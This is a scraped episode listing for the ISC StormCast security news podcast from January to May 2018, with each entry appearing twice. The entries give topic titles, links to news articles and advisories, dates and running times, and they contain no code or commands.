ISC StormCast for Tuesday, May 8th 2018

Parsing Windows Job Files https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ SYN-ACK Ransomware Uses Dobbleganging Technique https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/ More Drupal Compromises https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/ Russia vs. Telegram https://twitter.com/instasegv/status/993521755192020992 https://www.bleepingcomputer.com/news/government/russia-blocks-50-vpns-and-proxy-services-providing-access-to-telegram/
5/8/20184 minutes, 51 seconds
Episode Artwork

ISC StormCast for Tuesday, May 8th 2018

Parsing Windows Job Files https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/ SYN-ACK Ransomware Uses Dobbleganging Technique https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/ More Drupal Compromises https://badpackets.net/large-cryptojacking-campaign-targeting-vulnerable-drupal-websites/ Russia vs. Telegram https://twitter.com/instasegv/status/993521755192020992 https://www.bleepingcomputer.com/news/government/russia-blocks-50-vpns-and-proxy-services-providing-access-to-telegram/
5/8/20184 minutes, 51 seconds
Episode Artwork

ISC StormCast for Monday, May 7th 2018

Malicious NPM Library Stopped https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies Popular GDPR Shield http://gdpr-shield.io (currently down) More Spectre Flaws https://www.heise.de/ct/artikel/Exclusive-Spectre-NG-Multiple-new-Intel-CPU-flaws-revealed-several-serious-4040648.html
5/7/20185 minutes, 20 seconds
Episode Artwork

ISC StormCast for Monday, May 7th 2018

Malicious NPM Library Stopped https://blog.npmjs.org/post/173526807575/reported-malicious-module-getcookies Popular GDPR Shield http://gdpr-shield.io (currently down) More Spectre Flaws https://www.heise.de/ct/artikel/Exclusive-Spectre-NG-Multiple-new-Intel-CPU-flaws-revealed-several-serious-4040648.html
5/7/20185 minutes, 20 seconds
Episode Artwork

ISC StormCast for Friday, May 4th 2018

More WebLogic Exploits https://isc.sans.edu/forums/diary/WebLogic+Exploited+in+the+Wild+Again/23617/ Ouch! GDPR Newsletter https://www.sans.org/security-awareness-training/ouch-newsletter GitHub / Twitter Password Storage Issues https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html https://www.zdnet.com/article/github-says-bug-exposed-account-passwords/ Facebook adds Homegraph Alert to Certificate Transparency log monitoring https://www.facebook.com/notes/protect-the-graph/phishing-domain-detection/2037453483161459/ Disrupting the Empire: Identifying PowerShell Empire Command and Control Activity https://www.sans.org/reading-room/whitepapers/forensics/disrupting-empire-identifying-powershell-empire-command-control-activity-38315
5/4/201814 minutes, 48 seconds
Episode Artwork

ISC StormCast for Friday, May 4th 2018

More WebLogic Exploits https://isc.sans.edu/forums/diary/WebLogic+Exploited+in+the+Wild+Again/23617/ Ouch! GDPR Newsletter https://www.sans.org/security-awareness-training/ouch-newsletter GitHub / Twitter Password Storage Issues https://blog.twitter.com/official/en_us/topics/company/2018/keeping-your-account-secure.html https://www.zdnet.com/article/github-says-bug-exposed-account-passwords/ Facebook adds Homegraph Alert to Certificate Transparency log monitoring https://www.facebook.com/notes/protect-the-graph/phishing-domain-detection/2037453483161459/ Disrupting the Empire: Identifying PowerShell Empire Command and Control Activity https://www.sans.org/reading-room/whitepapers/forensics/disrupting-empire-identifying-powershell-empire-command-control-activity-38315
5/4/201814 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, May 3rd 2018

GPS Jamming Becoming More Common https://www.avweb.com/avwebflash/news/GPS-Jamming-Major-Threat-to-Drone-230749-1.html https://www.heise.de/newsticker/meldung/GPS-unter-Beschuss-Jamming-und-Spoofing-nehmen-zu-4038137.html Windows Command Line References https://isc.sans.edu/forums/diary/Windows+Commands+Reference+An+InfoSec+Must+Have/23613/ LoJack Laptop Anti-Theft Software "Phones Home" to Russia https://asert.arbornetworks.com/lojack-becomes-a-double-agent/ Google Maps Can Be Used as a URL Shortener https://nakedsecurity.sophos.com/2018/05/01/google-maps-open-redirect-flaw-abused-by-spammers/ Retrieving DVR Credentials via "Admin Cookie" https://github.com/ezelf/CVE-2018-9995_dvr_credentials
5/3/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Thursday, May 3rd 2018

GPS Jamming Becoming More Common https://www.avweb.com/avwebflash/news/GPS-Jamming-Major-Threat-to-Drone-230749-1.html https://www.heise.de/newsticker/meldung/GPS-unter-Beschuss-Jamming-und-Spoofing-nehmen-zu-4038137.html Windows Command Line References https://isc.sans.edu/forums/diary/Windows+Commands+Reference+An+InfoSec+Must+Have/23613/ LoJack Laptop Anti-Theft Software "Phones Home" to Russia https://asert.arbornetworks.com/lojack-becomes-a-double-agent/ Google Maps Can Be Used as a URL Shortener https://nakedsecurity.sophos.com/2018/05/01/google-maps-open-redirect-flaw-abused-by-spammers/ Retrieving DVR Credentials via "Admin Cookie" https://github.com/ezelf/CVE-2018-9995_dvr_credentials
5/3/20186 minutes, 2 seconds
Episode Artwork

ISC StormCast for Wednesday, May 2nd 2018

Creating Malicious Office Documents https://isc.sans.edu/forums/diary/Diving+into+a+Simple+Maldoc+Generator/23609/ Google (and Amazon) Disable Domain Fronting https://arstechnica.com/information-technology/2018/04/google-disables-domain-fronting-capability-used-to-evade-censors/ Google Chrome To Enforce Certificate Transparency https://groups.google.com/a/chromium.org/forum/#!msg/ct-policy/wHILiYf31DE/iMFmpMEkAQAJ
5/2/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, May 2nd 2018

Creating Malicious Office Documents https://isc.sans.edu/forums/diary/Diving+into+a+Simple+Maldoc+Generator/23609/ Google (and Amazon) Disable Domain Fronting https://arstechnica.com/information-technology/2018/04/google-disables-domain-fronting-capability-used-to-evade-censors/ Google Chrome To Enforce Certificate Transparency https://groups.google.com/a/chromium.org/forum/#!msg/ct-policy/wHILiYf31DE/iMFmpMEkAQAJ
5/2/20185 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, May 1st 2018

April WebLogic Patch Incomplete and Intense Scanning for WebLogic Under Way https://www.bleepingcomputer.com/news/security/hackers-scan-the-web-for-vulnerable-weblogic-servers-after-oracle-botches-patch/ Facex Worm Spreads Malicious Chrome Extensions via Facebook https://blog.trendmicro.com/trendlabs-security-intelligence/facexworm-targets-cryptocurrency-trading-platforms-abuses-facebook-messenger-for-propagation/ $15 DTV Transmitter as a SDR https://hackernoon.com/osmo-fl2k-a-15-dtv-transmitter-fm-radio-hijack-and-gps-spoofing-device-68ac08ba7d76
5/1/20185 minutes, 40 seconds
Episode Artwork

ISC StormCast for Tuesday, May 1st 2018

April WebLogic Patch Incomplete and Intense Scanning for WebLogic Under Way https://www.bleepingcomputer.com/news/security/hackers-scan-the-web-for-vulnerable-weblogic-servers-after-oracle-botches-patch/ Facex Worm Spreads Malicious Chrome Extensions via Facebook https://blog.trendmicro.com/trendlabs-security-intelligence/facexworm-targets-cryptocurrency-trading-platforms-abuses-facebook-messenger-for-propagation/ $15 DTV Transmitter as a SDR https://hackernoon.com/osmo-fl2k-a-15-dtv-transmitter-fm-radio-hijack-and-gps-spoofing-device-68ac08ba7d76
5/1/20185 minutes, 40 seconds
Episode Artwork

ISC StormCast for Monday, April 30th 2018

A Few Sample #Drupal Exploits including CVE-2018-7602 https://isc.sans.edu/forums/diary/More+Threat+Hunting+with+User+Agent+and+Drupal+Exploits/23597/ Triggering SMB Connections to Steal NTLM Credentials via PDFs https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/ NTFS Crash DoS Exploit Published for Windwos 10 and 7 https://github.com/mtivadar/windows10_ntfs_crash_dos Apple HomeKit / Secure Element Problems https://www.youtube.com/watch?v=1CNAMgctAp0 Azucar Assessing Azure Security https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/introducing-azucar/
4/30/20186 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, April 30th 2018

A Few Sample #Drupal Exploits including CVE-2018-7602 https://isc.sans.edu/forums/diary/More+Threat+Hunting+with+User+Agent+and+Drupal+Exploits/23597/ Triggering SMB Connections to Steal NTLM Credentials via PDFs https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/ NTFS Crash DoS Exploit Published for Windwos 10 and 7 https://github.com/mtivadar/windows10_ntfs_crash_dos Apple HomeKit / Secure Element Problems https://www.youtube.com/watch?v=1CNAMgctAp0 Azucar Assessing Azure Security https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/april/introducing-azucar/
4/30/20186 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, April 27th 2018

HP iLO Ransomware https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/ Total Meltdown Exploit Available https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ WD My Cloud EX2 Access Control Bypass https://www.trustwave.com/Resources/SpiderLabs-Blog/WD-My-Cloud-EX2-Serves-Your-Files-to-Anyone/ Hyperoptic ZTE Home Router Hardcoded Account https://www.contextis.com/resources/advisories/hyperoptic-zte-home-routers
4/27/20187 minutes, 12 seconds
Episode Artwork

ISC StormCast for Friday, April 27th 2018

HP iLO Ransomware https://www.bleepingcomputer.com/news/security/ransomware-hits-hpe-ilo-remote-management-interfaces/ Total Meltdown Exploit Available https://blog.xpnsec.com/total-meltdown-cve-2018-1038/ WD My Cloud EX2 Access Control Bypass https://www.trustwave.com/Resources/SpiderLabs-Blog/WD-My-Cloud-EX2-Serves-Your-Files-to-Anyone/ Hyperoptic ZTE Home Router Hardcoded Account https://www.contextis.com/resources/advisories/hyperoptic-zte-home-routers
4/27/20187 minutes, 12 seconds
Episode Artwork

ISC StormCast for Thursday, April 26th 2018

New Drupal Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2018-004 Malicious Network Traffic From /bin/bash https://isc.sans.edu/forums/diary/Malicious+Network+Traffic+From+binbash/23591/ Insecure Hotel Locks https://safeandsavvy.f-secure.com/2018/04/25/researchers-find-way-to-generate-master-keys-to-hotels/ Amazon Echo As Evesdropping Device (signin required) https://info.checkmarx.com/wp-alexa
4/26/20185 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, April 26th 2018

New Drupal Remote Code Execution Vulnerability https://www.drupal.org/sa-core-2018-004 Malicious Network Traffic From /bin/bash https://isc.sans.edu/forums/diary/Malicious+Network+Traffic+From+binbash/23591/ Insecure Hotel Locks https://safeandsavvy.f-secure.com/2018/04/25/researchers-find-way-to-generate-master-keys-to-hotels/ Amazon Echo As Evesdropping Device (signin required) https://info.checkmarx.com/wp-alexa
4/26/20185 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, March 12th 2018

Paying For Ransomware Often Fails to Recover Files https://cyber-edge.com/cdr/#about-this-report Microtik Router Malware Infects Sysadmin PCs https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf CNNVD Held Back Vulnerabilities https://www.recordedfuture.com/chinese-mss-vulnerability-influence/ Keeper Exposes S3 Bucket http://www.zdnet.com/article/password-manager-maker-keeper-hit-by-another-security-snafu/ https://keepersecurity.com/blog/2018/03/10/keepers-response-zdnets-article-regarding-s3-bucket-configuration-issue/ Chip and Pin Clones https://www.kaspersky.com/blog/chip-n-pin-cloning/21502/
3/12/20187 minutes, 34 seconds
Episode Artwork

ISC StormCast for Monday, March 12th 2018

Paying For Ransomware Often Fails to Recover Files https://cyber-edge.com/cdr/#about-this-report Microtik Router Malware Infects Sysadmin PCs https://s3-eu-west-1.amazonaws.com/khub-media/wp-content/uploads/sites/43/2018/03/09133534/The-Slingshot-APT_report_ENG_final.pdf CNNVD Held Back Vulnerabilities https://www.recordedfuture.com/chinese-mss-vulnerability-influence/ Keeper Exposes S3 Bucket http://www.zdnet.com/article/password-manager-maker-keeper-hit-by-another-security-snafu/ https://keepersecurity.com/blog/2018/03/10/keepers-response-zdnets-article-regarding-s3-bucket-configuration-issue/ Chip and Pin Clones https://www.kaspersky.com/blog/chip-n-pin-cloning/21502/
3/12/20187 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, March 9th 2018

Apache Solr Vulnerability used to Install Cryptocoin Miner https://isc.sans.edu/forums/diary/Apache+SOLR+the+new+target+for+cryptominers/23425/ CRIMEB4NK IRC Bot https://isc.sans.edu/forums/diary/CRIMEB4NK+IRC+Bot/23423/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Any.Run Malware Analysis Tool https://any.run
3/9/20186 minutes, 5 seconds
Episode Artwork

ISC StormCast for Friday, March 9th 2018

Apache Solr Vulnerability used to Install Cryptocoin Miner https://isc.sans.edu/forums/diary/Apache+SOLR+the+new+target+for+cryptominers/23425/ CRIMEB4NK IRC Bot https://isc.sans.edu/forums/diary/CRIMEB4NK+IRC+Bot/23423/ Cisco Patches https://tools.cisco.com/security/center/publicationListing.x Any.Run Malware Analysis Tool https://any.run
3/9/20186 minutes, 5 seconds
Episode Artwork

ISC StormCast for Thursday, March 8th 2018

Ransomware News: GlobeImposter Gets A Facelift, GandCrab is Still Out there https://isc.sans.edu/forums/diary/Ransomware+news+GlobeImposter+gets+a+facelift+GandCrab+is+still+out+there/23417/ How to Break Encryption https://blog.malwarebytes.com/threat-analysis/2018/03/encryption-101-how-to-break-encryption/ Bypassing Adobe Flash Security Protections https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-flash-protection-mechanism/ Hundreds of Bitcoin Mining Servers Stolen in Iceland https://www.theguardian.com/world/2018/mar/07/hundreds-of-bitcoin-mining-servers-stolen-in-iceland Several Android Mail Apps Send Password To Developer (article in German) https://www.kuketz-blog.de/mail-apps-zahlreiche-android-apps-uebermitteln-login-passwort/
3/8/20185 minutes, 49 seconds
Episode Artwork

ISC StormCast for Thursday, March 8th 2018

Ransomware News: GlobeImposter Gets A Facelift, GandCrab is Still Out there https://isc.sans.edu/forums/diary/Ransomware+news+GlobeImposter+gets+a+facelift+GandCrab+is+still+out+there/23417/ How to Break Encryption https://blog.malwarebytes.com/threat-analysis/2018/03/encryption-101-how-to-break-encryption/ Bypassing Adobe Flash Security Protections https://securingtomorrow.mcafee.com/mcafee-labs/hackers-bypassed-adobe-flash-protection-mechanism/ Hundreds of Bitcoin Mining Servers Stolen in Iceland https://www.theguardian.com/world/2018/mar/07/hundreds-of-bitcoin-mining-servers-stolen-in-iceland Several Android Mail Apps Send Password To Developer (article in German) https://www.kuketz-blog.de/mail-apps-zahlreiche-android-apps-uebermitteln-login-passwort/
3/8/20185 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, March 7th 2018

Exploit for CVE-2018-6789 https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/ Microsoft Fixes USB Issues Introduced By February Patches https://support.microsoft.com/en-us/help/4090913/march5-2018kb4090913osbuild16299-251 123 Reg Looses Backups https://www.bleepingcomputer.com/news/business/123-reg-backup-snafu-causes-clients-to-lose-files-since-august-2017/ Android March Security Bulletin https://source.android.com/security/bulletin/2018-03-01#media-framework
3/7/20185 minutes, 49 seconds
Episode Artwork

ISC StormCast for Wednesday, March 7th 2018

Exploit for CVE-2018-6789 https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/ Microsoft Fixes USB Issues Introduced By February Patches https://support.microsoft.com/en-us/help/4090913/march5-2018kb4090913osbuild16299-251 123 Reg Looses Backups https://www.bleepingcomputer.com/news/business/123-reg-backup-snafu-causes-clients-to-lose-files-since-august-2017/ Android March Security Bulletin https://source.android.com/security/bulletin/2018-03-01#media-framework
3/7/20185 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, March 6th 2018

Malicious Bash Script with Multiple Features https://isc.sans.edu/forums/diary/Malicious+Bash+Script+with+Multiple+Features/23411/ More Memcached DDoS Attacks https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/ Spring Framework Vulnerability https://lgtm.com/blog/spring_data_rest_CVE-2017-8046 LTE Vulnerabilities http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE_NDSS18_paper.pdf
3/6/20186 minutes, 49 seconds
Episode Artwork

ISC StormCast for Tuesday, March 6th 2018

Malicious Bash Script with Multiple Features https://isc.sans.edu/forums/diary/Malicious+Bash+Script+with+Multiple+Features/23411/ More Memcached DDoS Attacks https://www.arbornetworks.com/blog/asert/netscout-arbor-confirms-1-7-tbps-ddos-attack-terabit-attack-era-upon-us/ Spring Framework Vulnerability https://lgtm.com/blog/spring_data_rest_CVE-2017-8046 LTE Vulnerabilities http://homepage.divms.uiowa.edu/~comarhaider/publications/LTE_NDSS18_paper.pdf
3/6/20186 minutes, 49 seconds
Episode Artwork

ISC StormCast for Monday, March 5th 2018

Protective Malicious Monero Crypto Coin Miners https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407/ memcached DDoS Attacks Ask For Ransom https://blogs.akamai.com/2018/03/memcached-now-with-extortion.html Cheap Android Trojans Come PreInstalled With Banking Malware https://news.drweb.com/show/?lng=en&i=11749&c=5 RedDrop Android Malware Installed via 3rd Party App Stores https://www.wandera.com/blog/reddrop-malware/
3/5/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Monday, March 5th 2018

Protective Malicious Monero Crypto Coin Miners https://isc.sans.edu/forums/diary/The+Crypto+Miners+Fight+For+CPU+Cycles/23407/ memcached DDoS Attacks Ask For Ransom https://blogs.akamai.com/2018/03/memcached-now-with-extortion.html Cheap Android Trojans Come PreInstalled With Banking Malware https://news.drweb.com/show/?lng=en&i=11749&c=5 RedDrop Android Malware Installed via 3rd Party App Stores https://www.wandera.com/blog/reddrop-malware/
3/5/20185 minutes, 30 seconds
Episode Artwork

ISC StormCast for Friday, March 2nd 2018

Censoring Images At Scale in #WeChat https://isc.sans.edu/forums/diary/Why+Does+Emperor+Xi+Dislike+Winnie+the+Pooh+and+Scrambled+Eggs/23395/ Trustico Update: Certificate Revocation List Monitor https://isc.sans.edu/crls.html Memcached Update: Github Attack https://githubengineering.com/ddos-incident-report/ http://powerofcommunity.net/poc2017/shengbao.pdf Microsoft Releases Intel Spectre Microcode Updates https://support.microsoft.com/en-us/help/4090007/intel-microcode-updates
3/2/20188 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, March 2nd 2018

Censoring Images At Scale in #WeChat https://isc.sans.edu/forums/diary/Why+Does+Emperor+Xi+Dislike+Winnie+the+Pooh+and+Scrambled+Eggs/23395/ Trustico Update: Certificate Revocation List Monitor https://isc.sans.edu/crls.html Memcached Update: Github Attack https://githubengineering.com/ddos-incident-report/ http://powerofcommunity.net/poc2017/shengbao.pdf Microsoft Releases Intel Spectre Microcode Updates https://support.microsoft.com/en-us/help/4090007/intel-microcode-updates
3/2/20188 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, March 1st 2018

How Did This Memcache Thing Happen? https://isc.sans.edu/forums/diary/How+did+this+Memcache+thing+happen/23391/ Trustico TLS Certificate Revocation https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wxX4Yv0E3Mk/QZt8UPhKAwAJ Flash on Its Way Out https://www.bleepingcomputer.com/news/security/google-chrome-flash-usage-declines-from-80-percent-in-2014-to-under-8-percent-today/ DNSSEC Is Getting Better But Still Struggeling http://www.theregister.co.uk/2018/02/28/dutch_name_authority_dnssec_validation_errors_can_be_eliminated/ Smart TV Firmware Flaws https://www.av-comparatives.org/wp-content/uploads/2018/02/avc_sigma_medion_201802.pdf
3/1/20186 minutes, 8 seconds
Episode Artwork

ISC StormCast for Thursday, March 1st 2018

How Did This Memcache Thing Happen? https://isc.sans.edu/forums/diary/How+did+this+Memcache+thing+happen/23391/ Trustico TLS Certificate Revocation https://groups.google.com/forum/#!msg/mozilla.dev.security.policy/wxX4Yv0E3Mk/QZt8UPhKAwAJ Flash on Its Way Out https://www.bleepingcomputer.com/news/security/google-chrome-flash-usage-declines-from-80-percent-in-2014-to-under-8-percent-today/ DNSSEC Is Getting Better But Still Struggeling http://www.theregister.co.uk/2018/02/28/dutch_name_authority_dnssec_validation_errors_can_be_eliminated/ Smart TV Firmware Flaws https://www.av-comparatives.org/wp-content/uploads/2018/02/avc_sigma_medion_201802.pdf
3/1/20186 minutes, 8 seconds
Episode Artwork

ISC StormCast for Wednesday, February 28th 2018

Memcached Servers Used in Reflective DDoS Attacks https://isc.sans.edu/forums/diary/Why+we+Dont+Deserve+the+Internet+Memcached+Reflected+DDoS+Attacks/23389/ Malspam Pushing Formbook Info Stealer https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/ Various SAML Parsers Affected by Comment Parsing Vulnerability https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
2/28/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, February 28th 2018

Memcached Servers Used in Reflective DDoS Attacks https://isc.sans.edu/forums/diary/Why+we+Dont+Deserve+the+Internet+Memcached+Reflected+DDoS+Attacks/23389/ Malspam Pushing Formbook Info Stealer https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/23387/ Various SAML Parsers Affected by Comment Parsing Vulnerability https://duo.com/blog/duo-finds-saml-vulnerabilities-affecting-multiple-implementations
2/28/20185 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, February 27th 2018

Enumerating S3 Buckets https://github.com/jordanpotti/AWSBucketDump Creating AWS Network Diagrams https://github.com/duo-labs/cloudmapper Selling Macs and "Find my Mac" Feature https://medium.com/@mulligan/how-i-sold-an-old-mac-and-unknowingly-tracked-its-location-for-over-3-years-9a35cd3ca4cf Apple Stopping Support for 1st Gen Apple TV and iTunes on Windows XP / Vista https://support.apple.com/en-us/HT208104
2/27/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Tuesday, February 27th 2018

Enumerating S3 Buckets https://github.com/jordanpotti/AWSBucketDump Creating AWS Network Diagrams https://github.com/duo-labs/cloudmapper Selling Macs and "Find my Mac" Feature https://medium.com/@mulligan/how-i-sold-an-old-mac-and-unknowingly-tracked-its-location-for-over-3-years-9a35cd3ca4cf Apple Stopping Support for 1st Gen Apple TV and iTunes on Windows XP / Vista https://support.apple.com/en-us/HT208104
2/27/20184 minutes, 44 seconds
Episode Artwork

ISC StormCast for Monday, February 26th 2018

Retrieving Malware Over Tor On Windows (Update) https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor+on+Windows/23379/ Blackholing Advertising Sites with Pi-Hole https://isc.sans.edu/forums/diary/Blackhole+Advertising+Sites+with+Pihole/23377/ Taxslayer Consent Degree with FTC https://biglawbusiness.com/cybersecurity-enforcers-wake-up-to-unauthorized-computer-access-via-credential-stuffing/ Fortinet (OMG) Mirai https://www.fortinet.com/blog/threat-research/omg--mirai-based-bot-turns-iot-devices-into-proxy-servers.html
2/26/20185 minutes, 33 seconds
Episode Artwork

ISC StormCast for Monday, February 26th 2018

Retrieving Malware Over Tor On Windows (Update) https://isc.sans.edu/forums/diary/Retrieving+malware+over+Tor+on+Windows/23379/ Blackholing Advertising Sites with Pi-Hole https://isc.sans.edu/forums/diary/Blackhole+Advertising+Sites+with+Pihole/23377/ Taxslayer Consent Degree with FTC https://biglawbusiness.com/cybersecurity-enforcers-wake-up-to-unauthorized-computer-access-via-credential-stuffing/ Fortinet (OMG) Mirai https://www.fortinet.com/blog/threat-research/omg--mirai-based-bot-turns-iot-devices-into-proxy-servers.html
2/26/20185 minutes, 33 seconds
Episode Artwork

ISC StormCast for Friday, February 2nd 2018

Adobe Flash 0-Day https://isc.sans.edu/forums/diary/Adobe+Flash+0Day+Used+Against+South+Korean+Targets/23301/ Adaptive Phishing Kit https://isc.sans.edu/forums/diary/Adaptive+Phishing+Kit/23299/ Crypto Miners "Payload of Choice" http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html Autosploit Links Shodan to Metasploit https://github.com/NullArray/AutoSploit
2/2/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Friday, February 2nd 2018

Adobe Flash 0-Day https://isc.sans.edu/forums/diary/Adobe+Flash+0Day+Used+Against+South+Korean+Targets/23301/ Adaptive Phishing Kit https://isc.sans.edu/forums/diary/Adaptive+Phishing+Kit/23299/ Crypto Miners "Payload of Choice" http://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html Autosploit Links Shodan to Metasploit https://github.com/NullArray/AutoSploit
2/2/20185 minutes, 31 seconds
Episode Artwork

ISC StormCast for Thursday, February 1st 2018

Tax Phishing Season Starts https://isc.sans.edu/forums/diary/Tax+Phishing+Time/23295/ Using FLIR In Incident Response https://isc.sans.edu/forums/diary/Using+FLIR+in+Incident+Response/23291/ Oracle MICROS POS Vulnerability https://erpscan.com/press-center/blog/oracle-micros-pos-breached/
2/1/20186 minutes, 50 seconds
Episode Artwork

ISC StormCast for Thursday, February 1st 2018

Tax Phishing Season Starts https://isc.sans.edu/forums/diary/Tax+Phishing+Time/23295/ Using FLIR In Incident Response https://isc.sans.edu/forums/diary/Using+FLIR+in+Incident+Response/23291/ Oracle MICROS POS Vulnerability https://erpscan.com/press-center/blog/oracle-micros-pos-breached/
2/1/20186 minutes, 50 seconds
Episode Artwork

ISC StormCast for Wednesday, January 31st 2018

DCShadow Attack https://www.dropbox.com/s/baypdb6glmvp0j9/Buehat%20IL%20v2.3.pdf https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Cisco WebVPN Update https://isc.sans.edu/forums/diary/Cisco+ASA+WebVPN+Vulnerability/23289/ Reviving DDE Code Execution via OneNote https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
1/30/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Wednesday, January 31st 2018

DCShadow Attack https://www.dropbox.com/s/baypdb6glmvp0j9/Buehat%20IL%20v2.3.pdf https://blog.alsid.eu/dcshadow-explained-4510f52fc19d Cisco WebVPN Update https://isc.sans.edu/forums/diary/Cisco+ASA+WebVPN+Vulnerability/23289/ Reviving DDE Code Execution via OneNote https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee
1/30/20186 minutes, 56 seconds
Episode Artwork

ISC StormCast for Tuesday, January 30th 2018

Lenovo Fingerprint Mananger Pro Vulnerability https://support.lenovo.com/us/en/product_security/len-15999 ClamAV Vulnerablities http://blog.clamav.net/2018/01/clamav-0993-has-been-released.html https://blog.malwarebytes.com/malwarebytes-news/2018/01/important-web-blocking-ram-usage/ Malwarebytes Corrupted Update https://www.malwarebytes.com/pdf/WebProtectionFP.pdf Cisco Adaptive Security Appliance Remote Code Execution Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1 Web2Top Proxy onion.tor Appears to Steal Ransomware Payments https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransomware-bitcoin-payments-onion-domains
1/30/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, January 30th 2018

Lenovo Fingerprint Mananger Pro Vulnerability https://support.lenovo.com/us/en/product_security/len-15999 ClamAV Vulnerablities http://blog.clamav.net/2018/01/clamav-0993-has-been-released.html https://blog.malwarebytes.com/malwarebytes-news/2018/01/important-web-blocking-ram-usage/ Malwarebytes Corrupted Update https://www.malwarebytes.com/pdf/WebProtectionFP.pdf Cisco Adaptive Security Appliance Remote Code Execution Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1 Web2Top Proxy onion.tor Appears to Steal Ransomware Payments https://www.proofpoint.com/us/threat-insight/post/double-dipping-diverting-ransomware-bitcoin-payments-onion-domains
1/30/20186 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, January 29th 2018

Analyzing a Word Document Used in a Pentest https://isc.sans.edu/forums/diary/Is+this+a+pentest/23283/ Analyzing BITS Activity https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ CryptoJacking on YouTube due to Malicious Ads https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/ Coincheck Hack Nets 400M USD https://coincheck.com/en/blog/4673 PHPBB Mirror Compromissed https://www.phpbb.com/community/viewtopic.php?f=14&t=2456896 Microsoft Disables Sepctre Variant 2 Patches https://support.microsoft.com/en-us/help/4078130/update-to-disable-mitigation-against-spectre-variant-2
1/29/20186 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, January 29th 2018

Analyzing a Word Document Used in a Pentest https://isc.sans.edu/forums/diary/Is+this+a+pentest/23283/ Analyzing BITS Activity https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/ CryptoJacking on YouTube due to Malicious Ads https://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-abuses-googles-doubleclick-to-deliver-cryptocurrency-miners/ Coincheck Hack Nets 400M USD https://coincheck.com/en/blog/4673 PHPBB Mirror Compromissed https://www.phpbb.com/community/viewtopic.php?f=14&t=2456896 Microsoft Disables Sepctre Variant 2 Patches https://support.microsoft.com/en-us/help/4078130/update-to-disable-mitigation-against-spectre-variant-2
1/29/20186 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, January 26th 2018

